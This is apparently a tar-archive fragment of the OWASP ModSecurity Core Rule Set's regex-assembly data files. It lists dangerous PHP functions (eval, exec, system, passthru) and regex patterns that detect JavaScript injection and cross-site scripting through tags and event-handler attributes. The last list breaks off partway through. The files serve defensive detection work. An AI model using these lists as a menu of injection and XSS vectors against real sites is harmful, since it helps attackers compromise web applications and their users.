PATH_TRANSLATED QUERY_STRING REQUEST_URI ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-933160.data���������������������������������������0000664�0000000�0000000�00000005727�14461225151�0023622�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������array_diff_uassoc array_diff_ukey array_filter array_intersect_uassoc array_intersect_ukey array_map array_reduce array_udiff array_udiff_assoc array_udiff_uassoc array_uintersect array_uintersect_assoc array_uintersect_uassoc assert assert_options base64_encode bson_decode bson_encode bzopen chr convert_uuencode create_function curl_exec curl_file_create curl_init debug_backtrace error_reporting escapeshellarg escapeshellcmd eval exec exif_imagetype exif_read_data exif_tagname exif_thumbnail file file_exists fileatime filectime filegroup fileinode filemtime fileperms finfo_open fopen fputs ftp_connect ftp_get ftp_nb_get ftp_nb_put ftp_put function_exists fwrite get_cfg_var get_current_user get_meta_tags getcwd getenv getimagesize getlastmod getmygid getmyinode getmypid getmyuid glob gzcompress gzdeflate gzencode gzfile gzopen gzread gzwrite hash_file hash_hmac_file hash_update_file header_register_callback hex2bin highlight_file html_entity_decode htmlentities htmlspecialchars htmlspecialchars_decode image2wbmp imagecreatefromgif imagecreatefromjpeg imagecreatefrompng imagecreatefromwbmp imagecreatefromxbm imagecreatefromxpm imagegd imagegd2 imagegif imagejpeg imagepng imagewbmp imagexbm ini_get ini_get_all ini_set iptcembed is_dir is_executable is_file is_readable is_writable is_writeable iterator_apply json_decode json_encode mb_ereg mb_ereg_match mb_ereg_replace mb_ereg_replace_callback mb_eregi mb_eregi_replace mb_parse_str md5_file method_exists mkdir move_uploaded_file mysql_query ob_clean ob_end_clean ob_end_flush ob_flush ob_get_clean ob_get_contents ob_get_flush ob_start odbc_connect odbc_exec odbc_execute odbc_result odbc_result_all opendir parse_ini_file parse_str passthru pg_connect pg_execute pg_prepare pg_query php_strip_whitespace php_uname phpinfo phpversion popen posix_getegid posix_geteuid posix_getgid posix_getlogin posix_getpwnam posix_kill posix_mkfifo posix_mknod posix_ttyname preg_match preg_match_all preg_replace preg_replace_callback preg_replace_callback_array preg_split print_r proc_close proc_get_status proc_nice proc_open proc_terminate putenv rawurldecode rawurlencode read_exif_data readdir readfile readgzfile register_shutdown_function register_tick_function rename_function runkit_constant_add runkit_constant_redefine runkit_function_add runkit_function_copy runkit_function_redefine runkit_function_rename runkit_method_add runkit_method_copy runkit_method_redefine runkit_method_rename session_set_save_handler session_start set_error_handler set_exception_handler set_include_path set_magic_quotes_runtime setdefaultstub sha1_file show_source simplexml_load_file simplexml_load_string socket_connect socket_create spl_autoload_register sqlite_array_query sqlite_create_aggregate sqlite_create_function sqlite_exec sqlite_open sqlite_popen sqlite_query sqlite_single_query sqlite_unbuffered_query stream_context_create stream_socket_client stripcslashes stripslashes strrev system tmpfile uasort uksort unpack unserialize urldecode urlencode usort var_dump �����������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-933161.data���������������������������������������0000664�0000000�0000000�00000002614�14461225151�0023613�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������abs acos acosh array arsort asin asinh asort assert atan atan2 atanh basename bindec ceil chdir checkdate chmod chop chown chroot closedir closelog compact constant copy cos cosh count crypt current date decoct define defined die dir dirname diskfreespace dl doubleval each easter_date easter_days echo empty end ereg eregi error_log exit exp explode extract fclose feof fgets fileowner filepro filesize filetype floatval flock floor flush fmod fread fstat ftell ftok function getdate gettext gettype gmdate hash header headers_list headers_sent hebrev hypot iconv idate implode include intdiv intval invoke is_a is_array is_bool is_callable is_double is_finite is_float is_infinite is_int is_integer is_link is_long is_nan is_null is_numeric is_object is_real is_resource is_scalar is_string isset join key ksort lcfirst levenshtein link linkinfo list localtime log log10 log1p lstat ltrim mail main max mbereg mbsplit metaphone mhash microtime min msql mysql natsort next octdec openlog ord pack pathinfo pclose pi pos pow prev print printf quotemeta rand range readline readlink recode rename require reset rewind round rsort rtrim scandir serialize settype shuffle similar_text sin sinh sizeof sleep sort soundex split spliti sprintf sqrt srand stat strcoll strlen strspn substr symlink syslog taint tan tanh tempnam textdomain time touch trim ucfirst umask uniqid unlink unset untaint usleep usort virtual wordwrap ��������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-934100.txt����������������������������������������0000664�0000000�0000000�00000000230�14461225151�0023503�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������_\$\$ND_FUNC\$\$_ __js_function \beval\s*\( String\s*\.\s*fromCharCode function\s*\(\s*\)\s*{ new\s+Function\s*\( this\.constructor module\.exports\s*= ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-941130.data���������������������������������������0000664�0000000�0000000�00000000415�14461225151�0023603�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������(?i)[\s\S]xlink:href\b (?i)[\s\S]xhtml\b (?i)[\s\S]xmlns\b (?i)[\s\S]!ENTITY\s+(?:\S+|%\s+\S+)\s+SYSTEM\b (?i)[\s\S]!ENTITY\s+(?:\S+|%\s+\S+)\s+PUBLIC\b (?i)[\s\S]data:text/html\b (?i)[\s\S]formaction\b (?i)[\s\S]@import\b (?i)[\s\S];base64\b (?i)[\s\S]pattern\b.*?=\b ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-941160.data���������������������������������������0000664�0000000�0000000�00000051010�14461225151�0023603�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?c\W*?r\W*?i\W*?p\W*?t <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?f\W*?o\W*?r\W*?m <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?t\W*?y\W*?l\W*?e <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?v\W*?g <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?m\W*?a\W*?r\W*?q\W*?u\W*?e\W*?e <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?l\W*?i\W*?n\W*?k[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?o\W*?b\W*?j\W*?e\W*?c\W*?t[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?e\W*?m\W*?b\W*?e\W*?d[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?a\W*?p\W*?p\W*?l\W*?e\W*?t[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?p\W*?a\W*?r\W*?a\W*?m[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?i?\W*?f\W*?r\W*?a\W*?m\W*?e[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?b\W*?a\W*?s\W*?e[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?b\W*?o\W*?d\W*?y[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?m\W*?e\W*?t\W*?a[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?i\W*?m\W*?a?\W*?g\W*?e?[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?v\W*?i\W*?d\W*?e\W*?o[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?a\W*?u\W*?d\W*?i\W*?o[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g\W*?s[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?s\W*?e\W*?t[^>\w] <[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?a\W*?n\W*?i\W*?m\W*?a\W*?t\W*?e[^>\w] (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)background[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)formaction[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)lowsrc[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onAppCommand[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMActivate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMAttrModified[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMCharacterDataModified[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMFocusIn[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMFocusOut[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMMouseScroll[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeInsertedIntoDocument[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeInserted[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeRemovedFromDocument[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMNodeRemoved[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onDOMSubtreeModified[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onLoad[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozAfterPaint[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozAudioAvailable[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozBeforeResize[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozEdgeUICanceled[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozEdgeUICompleted[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozEdgeUIStarted[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMagnifyGestureStart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMagnifyGestureUpdate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMagnifyGesture[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMouseHittest[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozMousePixelScroll[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozPressTapGesture[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozRotateGestureStart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozRotateGestureUpdate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozRotateGesture[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozScrolledAreaChanged[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGestureEnd[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGestureStart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGestureUpdate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozSwipeGesture[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onMozTapGesture[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onRequest[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGAbort[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGError[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGLoad[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGResize[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGScroll[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGUnload[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onSVGZoom[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onabort[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onactivate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onadapteradded[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaddtrack[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onafterprint[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onafterscriptexecute[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onafterupdate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onalerting[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onanimationend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onanimationiteration[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onanimationstart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onantennastatechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaudioend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaudioprocess[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onaudiostart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeactivate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforedeactivate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforecopy[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforecut[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeeditfocus[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforepaste[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeprint[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforescriptexecute[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeunload[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeforeupdate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbeginEvent[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbegin[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onblocked[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onblur[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbounce[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onboundary[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbroadcast[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onbusy[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncached[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncallschanged[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncanplay[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncanplaythrough[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncardstatechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncellchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncfstatechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchargingchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchargingtimechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onchecking[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onclick[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onclose[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncommand[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncommandupdate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncomplete[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncompositionend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncompositionstart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncompositionupdate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onconnected[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onconnecting[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncontextmenu[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncontrolselect[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncopy[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncuechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oncut[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondataavailable[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondatachange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondataerror[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondatasetchanged[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondatasetcomplete[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondblclick[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeactivate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeliveryerror[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeliverysuccess[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondevicefound[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondevicelight[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondevicemotion[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeviceorientation[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondeviceproximity[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondialing[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondisabled[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondischargingtimechange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondisconnected[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondisconnecting[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondownloading[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragdrop[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragenter[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragexit[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondraggesture[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragleave[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragover[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondragstart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondrop[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ondurationchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onemptied[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onenabled[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onendEvent[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onended[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onenter[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onerror[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onerrorupdate[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onexit[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfailed[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfilterchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfinish[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfocus[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfocusin[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onfocusout[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onformchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onforminput[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadaxismove[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadbuttondown[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadbuttonup[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepadconnected[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)ongamepaddisconnected[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onget[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onhashchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onheadphoneschange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onheld[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onhelp[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onholding[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onicccardlockerror[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oniccinfochange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onincoming[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oninput[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)oninvalid[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onkeydown[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onkeypress[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onkeyup[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onlevelchange[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadeddata[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadedmetadata[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadend[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onloadstart[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onlosecapture[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)only[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmark[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmessage[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmousedown[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseenter[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseleave[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmousemove[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseout[\s\x08]*?= (?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)onmouseover[\s\x08]*?= 